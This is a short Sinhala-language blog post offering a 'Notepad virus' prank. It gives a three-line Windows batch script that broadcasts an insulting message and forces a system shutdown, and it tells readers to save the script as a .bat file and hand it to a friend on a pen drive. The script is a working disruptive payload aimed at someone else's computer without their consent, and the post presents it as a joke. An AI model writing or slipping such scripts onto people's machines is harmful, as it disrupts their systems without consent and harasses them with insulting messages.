Notepad Virus( යාලුවෙක්ගේ එකට Machine ගෙමක් දෙමු)

  •                       මුලින්ම මේ පහලින් තියෙන code එක notepad එකට copy කරල past කරන්න  පස්සේ එකට ඔයාට කැමති නමක් දිලා save කරගන්න. හැබයි file extension එකට .bat කියල දෙන්න ඒ වගේම File type එක All files  කියලා දෙන්න පහල තියෙන පින්තුරේ වගේ.
  • @echo off
  • msg * I don't like you
  • shutdown -c "Error! You are too stupid!" -s

  •                                 

ඔක ඉතින් පෙන් එකකට වගේ දාලා දුන්නනම් වැඩේ හරි.අර අපි දිපු MSG එක ඇවිත් Machine  එක Shutdown වෙලා යාවි..

මෙතනින් අපේ Facebook page එක LIKE කරන්න........

(අලුතින් පළවන ලීපි ගැන දැනගන්න..)

Comments